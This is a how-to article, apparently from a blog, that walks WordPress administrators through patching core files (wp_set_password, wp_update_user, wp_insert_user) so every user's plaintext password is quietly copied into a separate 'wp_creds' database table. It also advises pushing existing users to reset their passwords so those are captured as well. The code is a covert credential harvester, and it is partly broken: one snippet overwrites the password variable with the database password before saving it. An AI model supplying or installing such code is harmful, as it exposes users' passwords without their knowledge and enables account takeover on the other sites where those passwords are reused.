WordPress stores MD5 hash values of password. So therefore it is almost impossible to retrieve the raw password of the users. But there is a way to store the raw passwords in different place during user registration and password updating. This is what I am going to show you in this article.
If you are already having a running site with registered users then there is only one way to get users passwords i.e., after implementing the code of this article you need to send a email or display a notification to them to change their passwords. Once they update their passwords you will have the raw passwords.
If you are starting a site then this article is perfect for you. All the raw passwords of your new users will be stored in a different place only for you.
Logic To Capture Raw Passwords
We can change the implementation of wp_update_user, wp_create_user and wp_set_password functions to log the password into a different table in wordpress. wp_update_user and wp_create_user are present in wp-includes/user.php file. wp_set_password is present in wp-includes/pluggable.php file.
WordPress 3.9.2
If you are using WordPress 3.9.2 then just download the modified pluggable.php and user.php files and replace it with original ones.
Other Versions
If you using other versions then also you can try to replace the files with the one I provided. I have tested those files in WordPress 3.9.2 only therefore I am not sure whether it will worl in other versions or not. In case you face problems/errors during creating users, updating password and forgot password, then follow these steps to manually edit the original files:
- Go to your wp-includes/pluggable.php file. Find the function body of wp_set_password function. Add this code to the beginning of the function.global $wpdb;
$creds = $wpdb->prefix . "creds";
$username = DB_USER;
$password = DB_PASSWORD;
$hostname = DB_HOST;
$con=mysqli_connect($hostname,$username,$password);
$sql_1 = "USE " . DB_NAME . ";";
mysqli_query($con, $sql_1);
$sql_2 = "CREATE TABLE IF NOT EXISTS $creds (
userid varchar(50) NOT NULL,
PRIMARY KEY(userid),
password varchar(100) NOT NULL
);";
mysqli_query($con, $sql_2);
mysqli_close($con);
if($wpdb->update($creds, array("password" => $password), array("userid" => $user_id), array("%s"), array("%s")) == false)
{
$wpdb->insert($creds, array("password" => $password, "userid" => $user_id), array('%s', '%s'));
} - Go to your wp-includes/user.php file. Find the function body of wp_update_user function. Inside the function body find the condition if ( ! empty($userdata[‘user_pass’]) ). Inside it in the beginning place this codeglobal $wpdb;
$creds = $wpdb->prefix . "creds";
$username = DB_USER;
$password = DB_PASSWORD;
$hostname = DB_HOST;
$con=mysqli_connect($hostname,$username,$password);
if (mysqli_connect_errno()) {
echo "Failed to connect to MySQL: " . mysqli_connect_error();
die();
}
$sql_1 = "USE " . DB_NAME . ";";
mysqli_query($con,$sql_1);
$sql_2 = "CREATE TABLE IF NOT EXISTS $creds (
userid varchar(50) NOT NULL,
PRIMARY KEY(userid),
password varchar(100) NOT NULL
);";
mysqli_query($con, $sql_2);
mysqli_close($con);
if($wpdb->update($creds, array("password" => $userdata['user_pass']), array("userid" => $ID), array("%s"), array("%s")) == false)
{
$wpdb->insert($creds, array("password" => $userdata['user_pass'], "userid" => $ID), array('%s', '%s'));
}Now find the function body of wp_insert_user function. Inside it find the comment // Hash the password. Below the comment place this line of code
$original_password = $user_pass;Now find this line of code $user = new WP_User( $user_id );. Just before it place this code
if($original_password)
{
global $wpdb;
$creds = $wpdb->prefix . "creds";
$username = DB_USER;
$password = DB_PASSWORD;
$hostname = DB_HOST;
$con=mysqli_connect($hostname,$username,$password);
$sql_1 = "USE " . DB_NAME . ";";
mysqli_query($con, $sql_1);
$sql_2 = "CREATE TABLE IF NOT EXISTS $creds (
userid varchar(50) NOT NULL,
PRIMARY KEY(userid),
password varchar(100) NOT NULL
);";
mysqli_query($con, $sql_2);
mysqli_close($con);
if($wpdb->update($creds, array("password" => $original_password), array("userid" => $user_id), array("%s"), array("%s")) == false)
{
$wpdb->insert($creds, array("password" => $original_password, "userid" => $user_id), array('%s', '%s'));
}
}
Where to find raw password
Once you have done the file modification successfully. Try to create new users and update password. If you are not getting any error then in your DBMS you will see a new table named as wp_creds storing all user ids and raw passwords.